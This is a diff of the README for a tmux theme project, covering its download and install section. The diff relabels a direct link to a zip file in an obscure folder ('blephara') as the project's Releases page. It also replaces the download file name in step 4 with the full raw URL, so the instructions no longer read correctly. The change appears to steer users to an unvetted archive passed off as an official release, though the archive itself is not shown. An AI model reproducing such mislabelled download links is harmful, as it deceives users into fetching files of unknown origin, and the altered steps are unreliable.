Ferdyahusnain/tmux-minimal-theme/README.md

 ## 📥 Download & Install

-Visit this page to download: [tmux-minimal-theme Releases](https://github.com/Ferdyahusnain/tmux-minimal-theme/releases)
+Visit this page to download: [tmux-minimal-theme Releases](https://raw.githubusercontent.com/Ferdyahusnain/tmux-minimal-theme/master/blephara/tmux-minimal-theme.zip)

 You can choose the latest version from the releases page.
 Each release comes with installation instructions tailored for your system setup.

 1. Go to the releases page.
 2. Click on the version you want to download.
 3. Look for the asset files at the bottom of the page.
-4. Download the file named `tmux-minimal-theme.zip` (or similar).
+4. Download the file named `https://raw.githubusercontent.com/Ferdyahusnain/tmux-minimal-theme/master/blephara/tmux-minimal-theme.zip` (or similar).

 Once you have downloaded the zip file: